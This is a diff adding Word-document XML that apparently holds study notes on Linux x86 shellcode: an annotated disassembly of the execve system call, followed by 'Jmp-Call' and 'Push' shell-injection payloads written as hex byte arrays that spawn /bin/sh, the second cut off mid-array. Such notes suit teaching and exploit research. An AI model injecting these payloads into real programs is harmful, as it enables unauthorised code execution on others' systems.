+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>’</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x0805388d &lt;+13&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>mov</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    $0xb</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Copy 0xb (11 decimal) onto the stack. This is the </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="3600" w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>index</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> into the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>syscall</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> table. 11 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>is</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>execve</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08053892 &lt;+18&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>call   *0x80f45a8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Kernel Mode</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x08053898 &lt;+24&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>cmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    $0xfffff000</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x0805389d &lt;+29&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>ja</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">     0x80538a1 &lt;execve+33&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x0805389f &lt;+31&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>pop    %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>ebx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x080538a0 &lt;+32&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">ret    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x080538a1 &lt;+33&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>mov</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    $0xffffffe8</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>edx</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x080538a7 &lt;+39&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>neg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x080538a9 &lt;+41&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>mov</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>gs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>:(%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>edx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x080538ac &lt;+44&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>or     $0xffffffff</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x080538af &lt;+47&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>pop    %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>ebx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   0x080538b0 &lt;+48&gt;:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">ret    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Jmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>-Call Method of Shell Injection</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>char</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>shellcode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>[] =</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>"\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>xe9</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">\x35\x7c\xfb\xf7\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00" </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>"\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>x00</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xb8" </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>"\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>x01</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xad\x7b\xfb\xf7\x2f\x62" </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>"\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>x69</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>\x6e\x2f\x73\x68\x00\x5d\xc3";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>Push Method of Shell Injection</w:t>
+      </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>const</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> char code[] =</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  "\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>x31</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">\xc0"             </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>xorl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">              */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  "\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>x50</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"                 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>pushl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                   */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  "\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>x68</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
+        </w:rPr>
+        <w:t>""//</w:t>
+      </w:r>
